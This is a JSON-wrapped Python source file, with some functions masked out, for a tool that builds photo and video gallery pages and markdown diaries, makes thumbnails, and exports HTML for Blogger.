"step-4": "<mask token>\n\n\nclass Post:\n\n def __init__(self, date, text, medias):\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match('\\\\[(\\\\d\\\\d\\\\d\\\\d/\\\\d\\\\d/\\\\d\\\\d)\\\\]\\\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n while post and not post[0].strip():\n del post[0]\n text = ''\n while post and not re.match('!?\\\\[\\\\]', post[0]):\n text += post[0]\n del post[0]\n text = re.sub('\\\\n\\\\n$', '\\n', text)\n medias = list()\n while post and (match := re.match('!?\\\\[\\\\]\\\\((.*)\\\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match('!?\\\\[\\\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime('%A %d %B %Y').capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n if self.text:\n html.append(markdown.markdown(self.text))\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, 
*self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.\n resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize,\n self.caption)\n\n\ndef relative_url(path, root):\n \"\"\"\n returns a normalized url to path relative from root\n \"\"\"\n try:\n url = os.path.relpath(path, root)\n except:\n error('Unable to make a relative url:', url, root)\n url = url.replace('\\\\', '/') if os.sep == '\\\\' else url\n return urllib.parse.quote(url)\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. 
Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n return title, posts\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\ndef compose_html_reduced(args, posts, title, target):\n html = list()\n html.append(START % title)\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n html.append(END)\n return html\n\n\ndef compose_html_full(args, posts, title, target):\n html = list()\n html.append(START % title)\n if args.diary:\n html.append(BUTTONS)\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n html.append('<script>')\n for post in posts:\n if post.medias:\n gallery_id = f'gallery-blog-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n if post.dcim:\n gallery_id = f'gallery-dcim-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n html.append('</script>')\n html.append(END)\n return html\n\n\ndef print_html_to_stream(args, posts, title, stream, target):\n if target == 'regular':\n for line in compose_html_full(args, posts, title, target):\n print(line, file=stream)\n else:\n for line in compose_html_reduced(args, posts, title, target):\n print(line, file=stream)\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n if html_name:\n if os.path.exists(html_name):\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\n<mask token>\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in ('.jpg', '.jpeg', '.png',\n '.gif', '.bmp', '.webp', '.tif')\n\n\ndef is_video_file(name):\n return os.path.splitext(name)[1].lower() in ('.mp4', '.webm', '.mkv',\n '.flv', '.m4v', '.avi', '.wmv', '.mts', '.vob', '.divx')\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\ndef validate_date(datestr):\n try:\n datetime.datetime.strptime(datestr, '%Y%m%d')\n return True\n except ValueError:\n return False\n\n\ndef date_from_name(name):\n if (match := 
re.search('(?:\\\\D|^)(\\\\d{8})(?:\\\\D|$)', name, re.ASCII)):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if (date := date_from_name(filename)):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})\\\\D(\\\\d{6})(?:\\\\D|$)', name,\n re.ASCII)):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits\n [4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if (time := time_from_name(filename)):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\n<mask token>\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n return (date, time, width, height, size\n ), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\ndef format_duration(duration):\n mn = duration // 60\n sec = duration % 60\n if mn <= 59:\n return f'm:s={mn:02}:{sec:02}'\n else:\n hour = mn // 60\n mn = mn % 60\n return f'h:m:s={hour:02}:{mn:02}:{sec:02}'\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n 
if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\ndef make_thumbnail_subdir(args, subdir_name, thumb_name, size, items, thumbdir\n ):\n print('Making thumbnail:', thumb_name)\n create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir)\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * 
len(height) + 1))\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? 
'\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\ndef list_of_files(sourcedir, recursive):\n \"\"\"\n Return the list of full paths for files in source directory\n \"\"\"\n result = list()\n if recursive is False:\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n result.append(os.path.join(sourcedir, basename))\n else:\n for root, dirs, files in os.walk(sourcedir):\n if '.nomedia' not in files:\n for basename in sorted_listdir(files):\n result.append(os.path.join(root, basename))\n return result\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n 
make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\ndef make_posts(args, dirname):\n if args.diary is True:\n if not args.sourcedir:\n return make_posts_from_diary(args)\n else:\n return make_posts_from_diary_and_dir(args)\n elif args.bydate is False:\n return make_posts_from_subdir(args, dirname)\n else:\n return make_posts_from_subdir_and_date(args, dirname)\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\ndef create_items_by_date(args, medias, posts):\n if args.dates == 'diary':\n required_dates = {post.date for post in posts}\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n bydate = defaultdict(list)\n for media_fullname in medias:\n date = date_from_item(media_fullname)\n if date in required_dates:\n item = create_item(args, media_fullname, args.sourcedir, args.\n thumbdir, 'dcim', 300)\n if item:\n bydate[date].append(item)\n for date, liste in bydate.items():\n liste.sort(key=lambda item: time_from_item(item.uri))\n return bydate\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\ndef make_posts_from_subdir_and_date(args, dirname):\n if args.bydir is False:\n medias = list_of_medias(args, dirname, args.recursive)\n subdirs = []\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n medias = [_ for _ in medias_ext if is_media(_)]\n subdirs = [_ for _ in medias_ext if not is_media(_)]\n posts = list()\n items = list()\n for media_fullname in subdirs:\n item = create_item(args, media_fullname, args.sourcedir, args.\n thumbdir, 'dcim', 300)\n if item:\n items.append(item)\n if items:\n post = Post(date='00000000', text='', medias=[])\n post.dcim = items\n posts.append(post)\n bydate = create_items_by_date(args, medias, posts)\n for date in sorted(bydate):\n post = 
Post.from_date(date)\n post.dcim = bydate[post.date]\n posts.append(post)\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\ndef online_images_url(args):\n try:\n if args.urlblogger.startswith('http:') or args.urlblogger.startswith(\n 'https:'):\n with urlopen(args.urlblogger) as u:\n buffer = u.read()\n else:\n with open(args.urlblogger, 'rb') as f:\n buffer = f.read()\n except:\n error('Unable to read url', args.urlblogger)\n buffer = buffer.decode('utf-8')\n online_images = dict()\n for match in re.finditer('<div class=\"separator\"((?!<div).)*?</div>',\n buffer, flags=re.DOTALL):\n div_separator = match.group(0)\n div_separator = div_separator.replace(' ', '')\n elem_div = objectify.fromstring(div_separator)\n for elem_a in elem_div.iterchildren(tag='a'):\n href = elem_a.get('href')\n thumb = elem_a.img.get('src')\n online_images[os.path.basename(href)] = href, thumb\n online_videos = list()\n for match in re.finditer(\n '<iframe allowfullscreen=\"allowfullscreen\".*?</iframe>', buffer,\n flags=re.DOTALL):\n iframe = match.group(0)\n online_videos.append(iframe)\n return online_images, online_videos\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = 
imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n html = compose_blogger_html(args, title, posts, online_images,\n online_videos)\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\ndef getconfig(options, config_filename):\n\n\n class Section:\n pass\n options.source = Section()\n options.thumbnails = Section()\n options.photobox = Section()\n config = MyConfigParser()\n config.read(config_filename)\n options.source.sourcedir = config.get('source', 'sourcedir')\n options.source.bydir = config.getboolean('source', 'bydir')\n options.source.bydate = 